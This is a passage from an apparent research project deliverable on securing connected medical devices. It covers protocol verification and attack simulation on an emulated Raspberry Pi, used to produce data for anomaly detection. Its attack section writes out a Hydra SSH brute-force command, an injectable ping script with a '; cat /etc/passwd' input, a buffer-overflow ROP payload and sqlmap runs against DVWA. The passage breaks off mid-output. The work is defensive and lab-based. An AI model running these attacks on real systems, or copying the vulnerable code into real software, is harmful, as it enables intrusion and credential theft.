Following the formal verification of the ZTO process, all security properties defined in Section 2.4.1 have been successfully verified using ProVerif. Specifically, The **confidentiality** properties have been verified by ensuring that the secret keys (such as the Domain Key) cannot be leaked or accessed by malicious parties, since they can only be used by the device with the correct Trusted Component. The confidentiality of the nonces was also ensured, as they are purely managed by the DM as a trusted entity. The property of **Integrity and Freshness** has been verified by proving that only authorized devices and holders can provide proof of possession of the required attributes through the creation of an appropriate VP, and only keys from the intended holders can be used. The **Authorization and Authentication** properties were also verified, as only devices with valid attributes and uncompromized keys can derive a correct MAC and trigger a successful run of the protocol. Finally, **Unforgeability** is guaranteed, since only the entity with the appropriate Trusted Component is able to create a valid signature. Finally, it should be noted that the verification process converges in a reasonable amount of time (under one minute).

2.4.3.2 Tamarin Models

We have defined lemmas for confidentiality and integrity to verify the security properties defined in our threat model. For the confidentiality of the root secret key, lemma *root_key_secrecy* is formulated (Listing 2.7). The confidentiality of protocol state value is captured in lemma *r_secrecy* for the value of *r*. Finally, the confidentiality of the derived shared secret is captured in lemma *k_d_secrecy*.

All these properties for the low-end ZTO verify correctly. For the high-end device, the secrecy of the shared secret fails to verify. The trace that is identified by analysing the output generated by Tamarin shows that the attacker can impersonate one of the protocol participants and send the Diffie-Hellman neutral element. Then all derived elements become trivially the Diffie-Hellman neutral element. To fix the protocol, a simple check is needed to exclude the possibility of using the neutral element. It should be noted that the bounded domain key is transmitted in an open channel (Listing 2.7, step 3, line 47). We experimented with two models in which the key is transmitted using symmetric and asymmetric encryption respectively. For both models, the check by Tamarin prover did not converge.

The ProVerif model for high-end ZTO onboarding is successfully verified whereas the Tamarin model fails to verify the secrecy of the shared secret. The reason is that the Tamarin Diffie-Hellman theory is aware of the neutral element whereas the ProVerif formalization is not. The ProVerif formalization only captures the commutativity (see Listing 2.5, line 42). On the other hand, if we assume that the neutral element is not used, the successful verification of the ProVerif model gives us confidence that the protocol is secure. These results, combining output from two protocol verification tools, illustrate the benefits of using more than one tool in the formal verification process. This justifies our decision to use multiple back-ends for the DSL.

2.5 Runtime Verification

Runtime verification is a lightweight formal verification technique that monitors and analyzes the behavior of software and hardware during their actual execution. The goal is to ensure that they conform to the specified properties and requirements. Unlike exhaustive techniques such as model checking, runtime verification focuses on checking individual execution traces, making it more practical for complex or real-world systems where full verification is infeasible. We plan to use this technique to ensure the correct implementation of the security protocols and verify security properties that cannot be checked at design time because the verification of complex protocols may not converge.

The goal of the runtime verification is to retrieve security properties that need to be verified at runtime from the DSL. We aim to apply runtime verification by sniffing the network of the CMDs to monitor the REST calls made to run the defined security protocols. This is then used to monitor that the CMDs behave as described in the security protocols

Figure 2.7 shows the runtime verification module integrated into a Digital Twin (DT) system. We make use of the monitoring capabilities of DTs to perform runtime verification. Furthermore, we aim to apply this also during pre-deployment, where we make use of an emulation platform to deploy the CMDs software and run the security protocols. This ensures that the defined security properties are verified before deploying them in the real-world environment. Furthermore, during the operational phase, the emulation platform can be used to test what-if scenarios.

Figure 2.7: Emulation Platform Integrated into a Digital Twin System

2.6 Next Actions and Roadmap

The envisaged roadmap includes actions for making the described components complete and for further modelling and verification of the remaining ENTRUST protocols. More concretely, the following actions will be taken:

- Model and verify the Agile Swarm Attestation protocol (to be documented in Deliverable D6.2 [29])
- Develop a translator from the DSL to the Tamarin back-end
- Investigate further how to emulate the CMDs in the context of the DT system to perform runtime monitoring

Chapter 3

Attack Simulation and AI-Based Misbehaviour Detection

One core pillar of the ENTRUST project is *attack detection, with a focus on proactively identifying security threats targeting Connected Medical Devices (CMDs) through intelligent monitoring and analysis*. Given the safety-critical nature of these systems and their exposure to cyber-physical risks, ENTRUST emphasizes the development of **scalable and adaptive mechanisms that detect anomalies indicative of malicious behaviour**. Within the ENTRUST framework, this capability serves as an additional **Trust Source** feeding into the **Trust Assessment Framework (TAF)**. The anomalies identified by the anomaly detection module can be leveraged for evaluating the Attestation Trust Level (ATL) of the device, supporting a more comprehensive and dynamic assessment of its trustworthiness based on both static and runtime evidence. The anomaly detection capability involves leveraging both **emulation-based attack simulation** to generate rich behavioural traces and **AI-driven techniques** to analyse these traces for early warning signs of compromise. By combining high-fidelity system modelling with unsupervised learning and automated configuration, the project aims to deliver robust and explainable detection capabilities suitable for real-world deployment across diverse CMD environments.

To proactively detect and mitigate security threats, this chapter presents two complementary approaches developed within the ENTRUST project: (i) **attack simulation and hardware emulation for CMDs** and (ii) **automated configuration of unsupervised anomaly detection systems**.

The first approach leverages full-system hardware emulation to simulate attack scenarios on CMDs in a controlled environment. Specifically, **we utilize QEMU to emulate a Raspberry Pi system running the native Raspberry Pi OS**, enabling high-fidelity reproduction of the ARM architecture. This setup allows us to simulate realistic attack vectors targeting CMDs and to monitor the resulting system-level behaviour. For a full-system hardware emulation, we emulated a Raspberry Pi using QEMU as a representative high-end embedded device. The Raspberry Pi was chosen because it is widely used as a gateway or edge device in connected systems, offering a balance between computational capability and low power consumption, which makes it relevant for many CMD scenarios. Additionally, the Raspberry Pi has broad OS support (Raspberry Pi OS, Ubuntu, etc.), readily available images, and a large community, making it easier to emulate and test software that would realistically run on similar ARM-based platforms. *We can extend this approach to emulate other devices as well, both high-end and low-end, as long as a compatible OS image and hardware profile are available.*

During the simulation, we capture **detailed runtime traces** as detailed in D5.2 [32] (including **CPU utilization, memory consumption, temperature fluctuations, and network activity**) under both benign and malicious conditions. These traces serve two purposes: they **provide insight into the behavioural**

signatures of attacks, and they **generate anomalies** that can be used to guide and evaluate downstream detection techniques.

Building upon the insights and data collected through attack simulation, the second approach focuses on optimizing the performance of unsupervised anomaly detection systems. In particular, we target **clustering-based unsupervised learning models**, which are well-suited for detecting unknown or evolving threats in **unlabeled datasets**. Unlabeled datasets refer to *collections of data that lack predefined class or category annotations, meaning there is no prior indication of whether specific observations represent normal behavior or anomalies*. This characteristic makes them particularly relevant in cybersecurity contexts, where explicit attack labels are often unavailable or incomplete. However, the performance of such unsupervised models is highly sensitive to configuration parameters (e.g., distance thresholds, number of clusters, normalization methods). To address this challenge, we introduce an automated configuration strategy that combines metamorphic testing (used to define properties and expected relationships in the output of unsupervised models without requiring labeled data) with Bayesian optimization (a probabilistic optimization technique that efficiently searches for optimal hyperparameter settings by modeling performance as a function of configuration parameters). This method systematically explores the configuration space and evaluates candidate settings using properties that can be derived from the simulated attack data. By doing so, it identifies robust configurations without requiring labeled ground truth, thereby improving detection accuracy and reducing the need for manual tuning.

Together, these two approaches - attack simulation and hardware emulation for CMDs, and automated configuration of unsupervised anomaly detection systems form a cohesive framework for improving the security of CMDs within the ENTRUST project. The first approach provides high-quality, realistic data by emulating CMD environments using full-system hardware emulation and simulating various attack scenarios. This process generates detailed system behavior traces, including CPU usage, memory patterns, and network activity under both normal and attack conditions. These traces serve as a foundational resource for building and validating anomaly detection models.

The second approach operates by using this emulated and attack-labeled data to **automatically configure and optimize unsupervised anomaly detection methods**. Specifically, clustering-based models are tuned through a combination of metamorphic testing and Bayesian optimization to find robust parameter settings that maximize detection effectiveness across varying device configurations and operational contexts. This configuration phase ensures that anomaly detection models are not only accurate but also adaptable to the evolving characteristics of CMD systems.

Within the ENTRUST framework, these two phases are integrated as part of the broader Trust Assessment process. The attack simulation and emulation phase feeds contextualized threat and anomaly information into the TAF, while the automatically configured anomaly detection module acts as an additional Trust Source. This contributes to the dynamic evaluation of a device's **Attestation Trust Level (ATL)**, enhancing the ENTRUST system's capability to monitor, assess, and respond to security risks in a scalable and adaptive manner.

In the current phase of the project, we have assessed the automated configuration approach using six datasets, including simulated and actual time-series log data from Drones, Electrocardiogram (ECG) machine, and Computer Numerical Control (CNC) machine. The datasets consist of four simulated Drone datasets, acquired from various drone control programs (DJI, Ardupilot, and PX4), and two real ECG and CNC datasets (Sleep-Apnea and Bosch-CNC). These datasets enabled us to validate the effectiveness and generalizability of our method across varied anomaly detection scenarios. In the final phase of the project, we will extend this evaluation by applying our overall approach—combining attack simulation, emulation, and automated configuration—to real-world pilots provided by our industry partners. This will allow us to assess the applicability and robustness of the solution in operational settings involving actual connected medical devices.

This chapter presents the technical foundations, implementation, and preliminary results of both approaches, highlighting their individual contributions and their synergy in enhancing the resilience of connected medical systems. In Section 3.1, we summarize our different attempts with different emulation environments. Section 3.2 presents our emulation architecture and pipeline. In Section 3.3, we present the attacks we implemented as part of our attack simulation approach. Section 3.4 introduces our automated configuration technique for our AI-based anomaly detection approach using unsupervised learning.

3.1 Experimental Environment Exploration for Hardware Emulation

In order to identify a suitable environment for performing and analysing different attacks on Raspberry Pi, we evaluated three different setups for emulating hardware: VirtualBox virtualization, Kubernetes containerization, and QEMU-based system emulation. The primary goal was to assess the feasibility of executing attacks and collecting low-level system metrics using tracing tools in each environment.

To guide this evaluation, we considered the following criteria:

- **Architecture Compatibility:** The ability to emulate or replicate the ARM-based architecture of Raspberry Pi to ensure that attacks behave similarly to real hardware.
- **Tracer Tool Support:** Compatibility with low-level monitoring tools such as eBPF, which require access to kernel headers and privileged operations.
- **System Observability:** The degree to which internal system metrics (CPU events, memory usage, syscall behavior) can be accessed and monitored during attack execution.
- **Reproducibility and Stability:** The ability to consistently recreate experimental conditions and avoid environment-specific inconsistencies.
- **Ease of Attack Deployment:** How straightforward it is to run attack scripts or binaries, install required packages, and configure the OS environment.

These criteria were chosen to ensure that the selected emulation environment would closely resemble the actual behavior of Raspberry Pi hardware while providing the necessary instrumentation to study security attacks in depth.

3.1.1 Hardware Emulation Component

The hardware emulation component forms the foundation of this security analysis, enabling the simulation of a Raspberry Pi environment for conducting various attack scenarios as explained above. To achieve this, QEMU, an open-source machine emulator, was selected as the primary tool for emulating the Raspberry Pi hardware architecture.

This choice is particularly aligned with the objectives of the ENTRUST project, where connected edge medical devices such as the Tellu Gateway are instantiated using Raspberry Pi hardware. QEMU provides a high-fidelity emulation of ARM-based architectures, making it well-suited for simulating these gateway devices and reproducing realistic runtime conditions. Furthermore, QEMU supports kernel-level instrumentation and monitoring capabilities that are essential for evaluating low-level system behaviors under attack, a core focus of ENTRUST.

In addition to Tellu Gateways, QEMU's flexible architecture allows it to be extended to other ARM-based devices commonly deployed in connected medical IoT and edge computing scenarios covered by ENTRUST. This makes it a scalable and versatile choice for emulating a broad range of hardware profiles across the project.

3.1.1.1 Use of QEMU for Raspberry Pi Emulation

QEMU was employed to emulate the ARM-based architecture of the Raspberry Pi, specifically targeting a configuration compatible with Raspbian OS, the official operating system for Raspberry Pi devices. This choice was motivated by QEMU's ability to accurately replicate the CPU, memory, and peripheral behaviors of the Raspberry Pi, allowing for a controlled and repeatable testing environment. The emulation process involved configuring QEMU with an ARM system image, including the necessary kernel and root filesystem, to mirror the software stack of a physical Raspberry Pi.

The setup process included specifying the machine type (e.g., 'raspi3') and allocating appropriate virtual resources, such as 1GB of RAM and 4GB of storage, to reflect typical Raspberry Pi hardware constraints. QEMU's support for debugging and performance monitoring features further enhanced its utility, enabling the collection of metrics during attack execution. Despite its advantages, it has its own challenges in timing behavior or incomplete hardware feature emulation (e.g., General-Purpose Input/Output (GPIO) interactions).

3.1.1.2 Benefits and Limitations

The use of QEMU provided significant benefits, including cost-effectiveness, the ability to test different attacks without hardware risk, and the flexibility to scale or modify the emulated environment as needed. However, limitations such as potential inaccuracies in emulating real-time hardware responses and the absence of certain low-level hardware interrupts require careful validation against physical Raspberry Pi devices for critical applications.

3.1.2 Integration Challenges

Integrating an emulated Raspberry Pi environment for security analysis and attack simulation presents several challenges that must be addressed to ensure accurate and reliable results. These challenges stem from the emulation process, the complexity of replicating real-world hardware behavior, and the limitations of current tracing capabilities.

In the subsequent section, we detail the hardware emulation environment used for experimentation and provide a justification for selecting QEMU based on its suitability for our analysis.

3.1.3 VirtualBox-based Raspberry Pi OS Virtualization

Initially, we used VirtualBox 7.0 to run a virtualized Raspberry Pi OS image. This setup allowed us to simulate an ARM-based environment to some extent and perform various attack experiments. While this method successfully supported basic attack scenarios, there were significant limitations in terms of system observability. Although we could use basic BPF tracer tools, the integration of advanced monitoring mechanisms such as eBPF or `ptrace`-based profilers proved inconsistent. Additionally, the lack of fine-grained control over the underlying hardware architecture limited the accuracy and depth of performance metrics critical for analyzing different attacks and vulnerabilities.

3.1.4 Containerized Raspberry Pi on Kubernetes

Next, we attempted to containerize the Raspberry Pi OS image and deploy it within a Kubernetes cluster. The motivation behind this approach was to leverage Kubernetes for the orchestration and scalability of multiple attack scenarios. However, this setup faced critical limitations, specifically, the inability to install tracer components due to missing Linux header files within the container environment. These missing headers are necessary to compile and load kernel modules for tools like eBPF, and in many managed container runtimes, access to kernel-level tracing interfaces is restricted. As a result, while the container-based setup was lightweight, scalable, and reproducible, it was unsuitable for detailed system-level monitoring and security experiment analysis. Such monitoring is essential for capturing low-level behavioral changes, such as system calls, memory access patterns, and CPU utilization that occur during attacks, enabling accurate diagnosis and evaluation of security mechanisms.

3.1.5 QEMU-based Emulated Raspberry Pi Environment

The final approach utilized QEMU to emulate a full Raspberry Pi system, running the native Raspberry Pi OS. This method provided the most faithful representation of the target ARM architecture and enabled complete access to system internals. Crucially, this environment can allow the installation and execution of tracer components such as eBPF, `ptrace`, and other kernel-level tracing tools. This capability can enable the collection of fine-grained performance metrics during the execution of simulated attacks.

3.1.5.1 Rationale for Choosing QEMU

Based on our comparative analysis, the QEMU-based setup was ultimately chosen for the following key reasons:

- **Full System Emulation:** QEMU supports full emulation of the ARM architecture, closely matching the behavior of physical Raspberry Pi hardware.
- **Compatibility with Tracer Tools:** Unlike containerized environments, QEMU emulation permits kernel access and installation of Linux header files, allowing tools like eBPF and `ptrace` to operate correctly to some extent.
- **Reproducibility and Control:** The QEMU environment is fully customizable and reproducible, enabling researchers to replicate experiments under identical system conditions and configurations.
- **Low-Cost and Safe Testing:** Emulating attacks in QEMU eliminates the need for physical hardware and avoids potential risks to real systems during exploit testing.

In summary, QEMU provides an optimal balance between fidelity, observability, and safety for conducting rigorous security experiments and performance monitoring on emulated Raspberry Pi environments.

3.2 Emulation Architecture and Pipeline

As shown in Figure 3.1, in this section, we provide a high-level overview of the emulation structure using QEMU for the Raspberry Pi and the workflow of executing attacks within this environment. Figure 3.1 illustrates the components involved and the process of simulating security threats.

Figure 3.1: High-Level Overview of Emulation Structure and Attack Workflow

3.2.1 Emulation Structure

The emulation environment is built using QEMU, which virtualizes a Raspberry Pi with Raspbian OS. The structure includes:

- **Host System:** The physical machine running QEMU, providing the computational resources.
- **QEMU Emulator:** The core component emulating the Raspberry Pi’s ARM architecture, including virtual CPU, memory, and network interfaces.
- **Emulated Raspberry Pi:** A virtual instance running Raspbian OS, configured with typical services (e.g., SSH, web server) and vulnerabilities for attack testing.
- **Network Layer:** A virtual network connecting the emulated system to the host, enabling attack execution and data exchange.

3.2.2 Attack Workflow

The attack process within our emulated environment is designed to simulate real-world adversarial behavior and analyze system responses in a controlled setting. The workflow is composed of the following key stages:

1. **Setup:** The process begins by configuring the QEMU emulator with a prebuilt Raspberry Pi OS image. This image contains the necessary software packages and tracing components. The emulator is launched from the host system, effectively simulating the hardware and software environment of a physical Raspberry Pi device.
2. **Attack Deployment:** Attacks are triggered either manually or via pre-scripted automation routines from within the emulated Raspberry Pi instance. Inputs to the attack scripts include CPU stress parameters, memory overload conditions, or malicious network packets. These attacks target specific system resources to observe degradation or disruption (e.g., CPU exhaustion, memory leakage, or network flooding).

Figure 3.2: Denial-of-Service (DoS) attack simulation on Raspberry Pi. The top part shows the system state before the attack, while the bottom shows the state during the attack with high CPU and memory usage.

- Monitoring:** During attack execution, low-level system metrics are continuously collected using monitoring tools such as eBPF tracer-based probes. These tools reside within the emulated Raspberry Pi OS and capture fine-grained telemetry, including CPU load, memory allocation, system calls, and I/O operations. The collected data serves as the primary output for analysis.
- Analysis:** The system metrics and logs generated during monitoring are extracted and analyzed on the host system. This stage evaluates the impact of attacks (e.g., performance degradation, service unavailability, or anomalous behavior), providing insights for security assessment. Findings are documented and can be used to benchmark defenses or refine detection mechanisms.

The emulation structure using QEMU provides a robust platform for simulating Raspberry Pi behavior and executing attacks in a controlled manner. The workflow ensures that attacks are deployed, monitored, and analyzed effectively, offering valuable insights into system vulnerabilities.

3.3 Attack Simulation Component

In this section, we present and analyze the attacks we implemented as part of our attack simulation approach.

3.3.1 Denial of Service (DoS) Attack

In this section, we detail a Denial-of-Service (DoS) attack executed on an emulated Raspberry Pi system. The attack aimed to overwhelm the system’s CPU and memory resources, rendering it unresponsive. The attack was simulated using a custom Python script that leverages multiple threads to consume system resources excessively.

3.3.1.1 Observed System Behavior

The figure in Figure 3.2 captures the state of the Raspberry Pi system before and after executing the DoS attack script.

Execution

- **Setup:** The emulated Raspberry Pi system was running typical background processes and had a baseline resource usage monitored via the top command.
- **Script Development:** A Python script was written to simulate the attack:
 - ✓ **Memory Hog Function:** Continuously allocated 1MB of memory per iteration using a list with a 0.1-second delay to control the rate of allocation.
 - ✓ **CPU Hog Function:** Implemented an infinite loop (while True: pass) to consume CPU cycles indefinitely.
 - ✓ **Threading:** Launched 10 threads for memory consumption and 5 threads for CPU consumption to amplify the attack's impact.
- **Attack Process:**
 - ✓ The script was executed on the Raspberry Pi with the customized Python script.
 - ✓ The attack was launched, and system resource usage was monitored before and during the attack using top.
- **Monitoring:** The top output was captured to compare system state:
 - ✓ Before Attack: CPU usage was 2.2% with a load average of 1.24 (0.50, 0.18), and memory usage was 428M/3.84G.
 - ✓ During Attack: CPU usage spiked to 100.0% with a load average of 1.53 (0.41, 0.14), and memory usage increased to 2.22G/3.84G, indicating significant resource exhaustion.

Through the DoS attack demonstration, we show how a simple yet effective DoS attack can significantly impair the performance of a resource-constrained device such as the Raspberry Pi. By hogging both CPU and memory through multi-threading, the attack script simulates real-world DoS conditions, which can be useful for testing the robustness and security mechanisms of embedded systems and IoT devices.

3.3.2 Brute Force Attack

In this experiment, we demonstrate a **Brute Force Attack** targeting a Raspberry Pi device via the SSH protocol. The goal of the attack is to gain unauthorized access by systematically attempting a large number of password combinations using a predefined password list.

Launching the Attack: The attack is initiated using the popular password-cracking tool Hydra. The attacker runs the following command from their machine:

```
hydra -l pi -P /rockyou.txt ssh://192.168.56.9
```

Here, `-l pi` specifies the target username (pi), `-P` points to the password list (in this case, the widely used `rockyou.txt` file), and the IP `192.168.56.9` represents the target Raspberry Pi.

Monitoring the Attack

On the Raspberry Pi, the system administrator monitors authentication attempts in real-time by using the following command:

```
tail -f /var/log/auth.log
```

As shown in Figure 3.3, multiple failed login attempts are logged, all originating from the attacker's IP address 192.168.56.1. These repeated failures indicate a brute force attempt in progress.

Defense with fail2ban:

To mitigate the attack, we use the fail2ban intrusion prevention tool. fail2ban scans log files (e.g., /var/log/auth.log) and bans IP addresses that show malicious signs, such as too many failed login attempts.

The status of fail2ban can be checked with the following command:

```
sudo fail2ban-client status sshd
```

The output confirms that the IP address 192.168.56.1 has been automatically banned after exceeding the allowed number of failed login attempts. This demonstrates how fail2ban acts as an effective defense mechanism against brute force attacks.

Figure 3.3: Demonstration of a Brute Force Attack on Raspberry Pi and mitigation via fail2ban.

This experiment showcases a real-world scenario where an SSH service is targeted using a brute force method. It highlights both the vulnerability of services exposed to the internet and the importance of automated log monitoring and response mechanisms such as fail2ban to enhance system security.

3.3.3 Command Injection Attack

In this experiment, we demonstrate a **Command Injection Attack** that exploits a vulnerable Python script deployed on a Raspberry Pi. The vulnerability arises from unsanitized user input being passed directly to a system command through Python's `os.system()` function.

Vulnerable Script

The following Python script accepts an IP address as input and uses it to construct a ping command:

```
import os
import sys

def run_ping(ip_address):
    # WARNING: This command is vulnerable to injection!
    command = f"ping -c 2 {ip_address}"
    os.system(command) # Directly passes user input to the system shell

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 vulnerable_script.py <IP address>")
        sys.exit(1)

    ip = sys.argv[1]
    run_ping(ip)
```

The function `run_ping()` constructs a shell command with the user-supplied IP address. However, because the input is passed directly into the shell without validation or sanitization, it becomes vulnerable to command injection.

Normal Behavior: When executed with a valid IP address such as 8.8.8.8, the script behaves as expected and displays the output of the ping command:

```
$ python3 injection_script.py 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=25.7 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=63 time=19.1 ms
--- 8.8.8.8 ping statistics ---
```

Malicious Input: An attacker can exploit the vulnerability by injecting an additional shell command using semicolons. For example:

```
$ python3 injection_script.py "8.8.8.8; cat /etc/passwd"
```

As shown in Figure 3.4, this causes the system to first execute the ping command and then display the contents of `/etc/passwd`, leaking sensitive system information such as usernames and system paths.

Security Implications

This kind of vulnerability can be perilous as it may allow an attacker to:

- Access sensitive files (e.g., /etc/passwd, /etc/shadow)
- Modify or delete data
- Escalate privileges
- Establish persistent backdoors

```

import os
import sys

def run_ping(ip_address):
    # WARNING: This command is vulnerable to injection!
    command = f"ping -c 2 {ip_address}"
    os.system(command) # Directly passes user input to the system shell

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 vulnerable_script.py <IP address>")
        sys.exit(1)

    ip = sys.argv[1]
    run_ping(ip)

```

Vulnerable function for injection attack

Vulnerable function intended behaviour

```

pi@raspberrypi:~$ python3 injection_script.py 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=25.7 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=63 time=19.1 ms

--- 8.8.8.8 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 19.107/22.414/25.721/3.307 ms

```

Ongoing injection attack to know system details such as passwords

```

pi@raspberrypi:~$ python3 injection_script.py "8.8.8.8; cat /etc/passwd"
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=21.9 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=63 time=13.8 ms

--- 8.8.8.8 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 13.844/17.855/21.867/4.011 ms
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

```

Figure 3.4: Demonstration of a Command Injection Attack exploiting a vulnerable Python script.

This attack demonstrates how seemingly simple and trusted system commands can become dangerous when user inputs are not properly validated. The command injection vulnerability illustrated here enabled the attacker to execute arbitrary commands on the system, specifically by appending `cat /etc/passwd` to a ping command. This attack exposes critical system files that may reveal user account information, which could be further exploited for privilege escalation or lateral movement within a network.

3.3.4 Return Oriented Programming (ROP) Chaining Attack

Return Oriented Programming (ROP) is a powerful exploitation technique used to gain control over program execution without injecting new code. In the context of an emulated Raspberry Pi, we demonstrate a ROP chaining attack to exploit a vulnerable function and redirect control flow to attacker-chosen code sequences, known as “gadgets”.

3.3.4.1 Vulnerable Function and Target Gadgets

As shown in Fig. 3.5, the program contains a vulnerable function named `vulnerable()`, which uses an unsafe `strcpy()` operation to copy user input into a fixed-size buffer. This opens the door to a classic buffer overflow attack. Additionally, the program defines three functions: `rop1()`, `rop2()`, and `rop3()`, each of which prints a specific message. These functions are used solely for demonstration purposes

Vulnerable function to be exploited for attack

```
void vulnerable(char* string)
{
    char buffer[100];
    strcpy(buffer, string);
}

int main(int argc, char** argv)
{
    if (argc < 2) {
        printf("Usage: %s <input_string>\n", argv[0]);
        return 1; // Exit with an error code if no input is provided
    }
    vulnerable(argv[1]);
    return 0;
}
```

Functions of interest for attack execution

```
void rop1()
{
    printf("ROP 1!\n");
}

void rop2() {
    printf("ROP 2!\n");
}

void rop3() {
    printf("ROP 3!\n");
}
```

Figure 3.5: Vulnerable function for exploiting ROP chaining attack.

to illustrate the ROP chaining mechanism; in a real-world scenario, an attacker could instead execute arbitrary malicious actions by chaining appropriate gadgets.

- **vulnerable()** is the entry point for the buffer overflow, allowing control of the instruction pointer.
- **rop1(), rop2(), rop3()** are benign gadgets chained by the attacker to demonstrate ROP execution flow.

3.3.4.2 Memory Tracing and Gadget Addresses

As shown in Fig. 3.6, using `gdb-peda`, we determine the memory addresses of the gadgets of interest:

```
rop1: 0x565561b9
rop2: 0x565561e4
rop3: 0x5655620f
```

These addresses are later used to overwrite the return address and chain the execution.

A memory tracer using `bpfttrace` confirms that the vulnerable function is entered, and the corresponding instruction pointers for each ROP gadget are successfully executed in sequence. The attacker uses payload construction tools (e.g., Python) to craft a precise input buffer, including padding (to fill 112 bytes) followed by the gadget addresses and a clean exit.

3.3.4.3 ROP Payload Construction

The attack payload is constructed using Python as follows:

```
python3 -c 'import sys; sys.stdout.buffer.write(
    b"A"*108 + b"BBBB" +
    b"\xb9\x61\x55\x56" + # rop1 address
    b"\xe4\x61\x55\x56" + # rop2 address
    b"\x0f\x62\x55\x56" + # rop3 address
    b"\x40\xfa\xdf\xf7" # exit
)'
```


Figure 3.6: Execution of ROP chaining attack.

This payload ensures that the buffer is overflowed exactly up to the return address and then redirects execution through `rop1()`, `rop2()`, and `rop3()`.

Here we demonstrate how a buffer overflow vulnerability in a simple C program running on an emulated Raspberry Pi can be exploited using ROP chaining. By identifying the memory addresses of useful gadgets and carefully crafting the input buffer, attackers can hijack control flow without injecting new code. This technique bypasses common protections such as non-executable stacks, underlining the importance of using stack canaries, ASLR (Address Space Layout Randomization), and safe coding practices like bounds checking.

3.3.5 Control Flow Attestation (CFA) Attack

Control Flow Attestation (CFA) is a technique designed to verify that a program's execution path has not been tampered with. However, an attacker can exploit vulnerabilities such as buffer overflows to subvert the intended control flow of a program, bypassing or skipping certain functions. Fig 3.7 illustrates a CFA attack on an emulated Raspberry Pi using GDB (GNU Debugger).

In the example program, the intended flow of execution is as follows:

- Execute `funcA()`
- Execute `funcB()`
- Execute `funcC()`

The attacker's goal is to manipulate the control flow such that the execution jumps directly from `funcA()` to `funcC()`, skipping `funcB()` entirely.

To achieve this, the attacker performs the following steps using GDB:

Figure 3.7: Execution of CFA attack.

- 1. Set breakpoints:** Breakpoints are placed at the start of funcA(), funcB(), and funcC() to monitor execution.
- 2. Inspect function addresses:** The memory addresses of funcA(), funcB(), and funcC() are retrieved to prepare for control manipulation.
- 3. Modify registers:**
 - The EIP (Instruction Pointer Register) is set to point to the address of funcC().
 - The ESP (Stack Pointer Register) is incremented to adjust for the stack layout, ensuring the new control flow does not cause a crash.
- 4. Continue execution:** When execution resumes, the program jumps directly from funcA() to funcC(), successfully bypassing funcB().

This attack demonstrates a successful control flow hijacking, where an adversary can manipulate the program to deviate from its original execution path. In this case, the program's output changes as funcB() is never executed, violating the expected control flow. Such manipulations can be more dangerous in real-world scenarios, where instead of skipping benign functions, attackers may insert malicious payloads or invoke unintended system calls.

3.3.6 SQL Injection Attack

SQL Injection is a code injection technique that exploits vulnerabilities in an application's database layer. In this attack, malicious SQL statements are inserted into application entry points, allowing attackers to manipulate database queries and potentially gain unauthorized access to sensitive data. The SQL injection attack was performed on a Damn Vulnerable Web Application (DVWA) running on an emulated Raspberry Pi environment.

3.3.6.1 Target Environment

- **Target System:** Emulated Raspberry Pi
- **Database:** MariaDB 10.5.26
- **Vulnerable Application:** DVWA (Damn Vulnerable Web Application)
- **Target URL:** `http://192.168.56.9/DVWA/vulnerabilities/sqli/`
- **Attack Tool:** SQLMap

3.3.6.2 Database Structure Analysis

As shown in Figure 3.8, initial reconnaissance revealed the following sensitive database structure:

- **Database Name:** dvwa
- **Available Tables:** guestbook, users
- **Target Table:** users (containing sensitive user information)

The users table contained critical information, including:

- User IDs and usernames
- Password hashes
- Personal information (first name, last name)
- Avatar file paths
- Login timestamps and failed login attempts

3.3.6.3 Attack Methodology

Phase 1: Manual Database Exploration

Initial exploration was conducted using direct MySQL access to understand the database structure:

```

1 -- Connect to MySQL as root
2 sudo mysql -u root -p
3
4 -- Select target database
5 USE dvwa;
6
7 -- Enumerate tables
8 SHOW TABLES;
9
10 -- Examine user data structure
11 SELECT * FROM users;
```

Listing 3.1: Database Reconnaissance Commands

```

pi@raspberrypi:~$ sqlmap -u "http://192.168.56.9/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=t9jcr0enn3o6v1f6o5o61l5gp4; security=low" --dbs
(1.5.2#stable)
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:53:32 /2025-03-26/

[13:53:32] [INFO] resuming back-end DBMS 'mysql'
[13:53:32] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.56.9:80/DVWA/login.php'. Do you want to follow? [Y/n] Y
[13:53:39] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
----
Parameter: id (GET)
  Type: boolean-based blind
  Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
  Payload: id=1' OR NOT 8450=8450-- kVhg&Submit=Submit

  Type: error-based
  Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
